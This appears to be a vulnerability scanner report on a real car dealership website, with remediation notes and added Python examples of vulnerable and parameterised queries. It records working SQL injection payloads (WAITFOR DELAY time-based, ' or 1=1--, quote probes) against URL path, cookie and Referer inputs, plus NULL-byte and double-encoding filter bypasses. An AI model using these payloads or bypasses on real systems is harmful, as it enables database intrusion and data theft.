<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso ...[SNIP]...
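Query construction behind a URL such as /Toyota/Sienna/, as an added example that is not the dealer site's code: the vulnerable concatenation beside the parameterised form the remediation background calls for. The table, the two lookup functions and the use of Python's bundled sqlite3 (standing in for the Microsoft SQL Server the report identifies) are assumptions; the payloads are the ones the report submitted in REST URL parameter 1 (the Sienna request) and in the confid parameter, URL-decoded.

```python
"""Concatenated versus parameterised query for a /<make>/<model>/ route.

Added example, not the site's code.  sqlite3 stands in for SQL Server, the
table is constructed sample data, and the lookup functions are assumptions.
"""
import sqlite3

TIME_DELAY_PAYLOAD = "Toyota'waitfor delay'0:0:20'--"   # REST URL parameter 1, Sienna request
BOOLEAN_PAYLOAD = "11313056' or 1=1-- "                 # confid parameter, difference-based test


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the site's model table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE models (make TEXT, model TEXT, page TEXT)")
    conn.executemany("INSERT INTO models VALUES (?, ?, ?)", [
        ("Toyota", "Sienna", "/Toyota/Sienna/"),
        ("Toyota", "Corolla", "/Toyota/Corolla/"),
        ("Scion", "tC", "/Scion/tC/"),
    ])
    return conn


def lookup_concatenated(conn: sqlite3.Connection, make: str, model: str) -> list:
    """Vulnerable: the URL segments are spliced into the SQL text, so a quote
    in either one ends the string literal and the remainder is parsed as SQL."""
    sql = ("SELECT page FROM models WHERE make = '" + make
           + "' AND model = '" + model + "'")
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn: sqlite3.Connection, make: str, model: str) -> list:
    """Fixed: the query structure is fixed first and the values are bound
    second, so a payload is compared as an ordinary string and matches no row."""
    sql = "SELECT page FROM models WHERE make = ? AND model = ?"
    return [row[0] for row in conn.execute(sql, (make, model))]


def structure_altered(conn: sqlite3.Connection, make: str, model: str) -> bool:
    """True when the concatenated query no longer parses as written.  sqlite
    has no WAITFOR, so the time-delay payload surfaces as a syntax error here;
    on SQL Server the same text would instead sleep for 20 seconds."""
    try:
        lookup_concatenated(conn, make, model)
        return False
    except sqlite3.OperationalError:
        return True
```

With the boolean payload the concatenated query returns every row because `-- ` comments out the rest of the WHERE clause; the parameterised query returns nothing for either payload and never raises, which is the behaviour the report's difference-based and time-based tests would both fail to detect once the fix is in place.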
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 54409 milliseconds to respond to the request, compared with 11073 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The observed difference (about 43 seconds) is more than twice the 20-second delay requested, which points to a slow or loaded server rather than a clean measurement; confirm with varying delay values before treating this as established.
The database appears to be Microsoft SQL Server, inferred from the WAITFOR DELAY syntax being honoured.
Request
GET /Toyota',0,0)waitfor%20delay'0%3a0%3a20'--/Corolla/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 03:40:49 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 47942
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /Toyota/Highlander%20Hybrid/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00'; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:26:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:26:54 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:26:53 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 25507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Highland ...[SNIP]... ority are abundant in the stylish 2011 Toyota Highlander Hybrid package. The all new Highlander Hybrid is exalted and for good reason; it boasts only the highest quality in features and design without exception. <br /> ...[SNIP]...
Request 2
GET /Toyota/Highlander%20Hybrid/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00''; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:27:09 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:27:10 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:27:10 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 25654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Highland ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /Toyota/Sequoia/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:20:41 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:20:42 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:20:42 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 37576
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Sequoia ...[SNIP]... <br /> Inside and out, the 2011 Sequoia never fails to impress with a polished front chrome grille, sporty rear spoiler, and convenient roof racks for transporting oversized cargo. Additionally, all 8 passengers will love the detailed wood-trimmed int ...[SNIP]...
Request 2
GET /Toyota/Sequoia/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:20:57 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:20:58 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:20:58 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 37311
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Sequoia ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 90730 milliseconds to respond to the request, compared with 17471 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The observed difference (about 73 seconds) is far larger than the 20-second delay the payload requests, and the 17-second baseline is itself far slower than the 1.8-second baseline recorded earlier in this report, so the measurement is confounded by server load; repeat the request with different delay values and check that the delta tracks them before treating this as confirmed.
The database appears to be Microsoft SQL Server, inferred from the WAITFOR DELAY syntax being honoured.
Request
GET /Toyota'waitfor%20delay'0%3a0%3a20'--/Sienna/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 404 Not Found Date: Wed, 08 Dec 2010 03:30:27 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 47986
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:05:40 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:05:40 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:05:41 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 28313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tacoma P ...[SNIP]... </div>The 2011 Toyota Tacoma PreRunner is a exceptional pick-up truck with stylish appeal.<br /> ...[SNIP]...
Request 2
GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:05:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:05:52 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:05:53 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 28262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tacoma P ...[SNIP]...
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00'; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:48:18 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:48:19 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:48:19 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 28261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tacoma P ...[SNIP]... </div>The 2011 Toyota Tacoma PreRunner is a exceptional pick-up truck with stylish appeal.<br /> ...[SNIP]...
Request 2
GET /Toyota/Tacoma%20PreRunner/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792%00''; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 02:48:33 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:48:34 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 02:48:34 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 28237
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tacoma P ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
The web server does not URL-decode request header values, so for the Referer value to reach the query containing a quote the application must itself be decoding it twice (%2527 becomes %27 on the first decode and ' on the second). There is no legitimate reason to decode a header value more than once: remove the extra decode, and in any case perform input validation after all custom canonicalisation has been carried out, on the same representation that is finally passed to the query.
Request 1
GET /Toyota/Tundra%20Double%20Cab%204x2/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:30:45 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:30:45 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:30:46 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 31218
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tundra D ...[SNIP]... IMG SRC='http://images.carprices.com/pricebooks_data/usa/colorized/2011/Toyota/View/Tundra_Double_Cab_4x2/Base/8241_040.jpg' WIDTH=277 STYLE='float:left; padding: 5px;margin: 5px;'>Drivers looking for exceptional strength should turn to this particular Tundra. With its large 5.7-liter engine, this V8 Tundra is ready to demonstrate its fearless performance. This trim additionally offers 18" steel wheels and c ...[SNIP]...
Request 2
GET /Toyota/Tundra%20Double%20Cab%204x2/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000; Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:30:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:30:52 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:30:53 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 31011
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Tundra D ...[SNIP]...
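The two bypasses reported above, the NULL byte bypass against a native-code filter (the User-Agent and cookie findings) and the double URL-encoding bypass against an application that decodes twice (the Referer finding just above), both come from validating a different string than the one the application finally uses. This added example, which is neither the site's nor the WAF's code, models both views and shows the canonicalise-once-then-validate approach the remediation details call for. The two input values are copied from the report's requests; the blacklist and the filter model are illustrative stand-ins for whatever the real filter checks.

```python
"""Canonicalise once, then validate on what the application actually uses.

Added example, not the site's or the WAF's code.  The two payloads are copied
from this report's requests; BLOCKED is an illustrative blacklist and the
filter model is an assumption about how a native-code filter behaves.
"""
from urllib.parse import unquote_to_bytes

# Request 1 of the User-Agent finding and Request 1 of the Referer finding,
# still percent-encoded exactly as they were sent.
UA_NUL_PAYLOAD = b"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'"
REFERER_DOUBLE_ENCODED = b"http://www.google.com/search?hl=en&q=%2527"

BLOCKED = (b"'", b"--")   # illustrative blacklist, not the real WAF rules


def native_filter_blocks(raw: bytes) -> bool:
    """Model of a native-code (C-string) filter: it decodes the value once and
    then stops reading at the first NUL because the string 'ends' there, so a
    quote placed after %00 is never inspected."""
    visible = unquote_to_bytes(raw).split(b"\x00", 1)[0]
    return any(tok in visible for tok in BLOCKED)


def application_view(raw: bytes, decodes: int) -> bytes:
    """What application code holds after `decodes` rounds of URL-decoding.
    PHP supplies one round for query and cookie values and none for headers;
    an extra round in application code is the bug behind the %2527 bypass.
    Note the quote in the User-Agent payload is literal, so it reaches the
    application whether or not the value is decoded at all."""
    value = raw
    for _ in range(decodes):
        value = unquote_to_bytes(value)
    return value


def bypass_possible(raw: bytes, app_decodes: int) -> bool:
    """True when the application ends up holding a blocked token that the
    filter never saw: exactly the mismatch each of the two bypasses exploits."""
    app_value = application_view(raw, app_decodes)
    return any(tok in app_value for tok in BLOCKED) and not native_filter_blocks(raw)


def canonicalise_and_validate(raw: bytes) -> bytes:
    """Decode exactly once, reject NUL bytes outright, then check the whole byte
    string (length-aware, never NUL-terminated).  Raises ValueError on failure;
    the returned value is what goes on as a bound query parameter."""
    value = unquote_to_bytes(raw)
    if b"\x00" in value:
        raise ValueError("NUL byte in input")
    if any(tok in value for tok in BLOCKED):
        raise ValueError("blocked token in input")
    return value


def is_accepted(raw: bytes) -> bool:
    """Convenience wrapper for callers that only need a yes/no answer."""
    try:
        canonicalise_and_validate(raw)
        return True
    except ValueError:
        return False
```

The Referer payload is accepted by the single-decode validator because after one decode it is the harmless text `%27`; the bypass only exists while application code decodes it a second time, which is why the fix is to remove that decode rather than to extend the blacklist.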
The BIGipServerAPACHE_DEV cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerAPACHE_DEV cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
On this platform (PHP, according to the X-Powered-By header) the runtime URL-decodes cookie values once when it populates $_COOKIE, so a second decode in application code is what turns %2527 into a quote before the BIGipServerAPACHE_DEV value reaches the query. There is no need to decode the value again: remove the extra decode, and in any case perform input validation after all custom canonicalisation has been carried out, on the same representation that is finally passed to the query.
Request 1
GET /Toyota/Venza/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000%2527;
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:35:48 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:49 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:35:49 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 27957
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>2011 Toyota Venza at ...[SNIP]... cebooks_data/usa/colorized/2011/Toyota/View/Venza/Base/2822_1F7.jpg' WIDTH=277 STYLE='float:left; padding: 5px;margin: 5px;'>The 4-door Toyota Venza comes equipped with a stellar 6-cylinder engine and exceptional all-wheel drive. You'll love the dual chrome exhaust tips, rear seat personal reading lamps, and the convenient cargo area tonneau cover. <DIV STYLE='float:right; width:850px;'> ...[SNIP]...
Request 2
GET /Toyota/Venza/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000%2527%2527;
Response 2
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 03:35:56 GMT
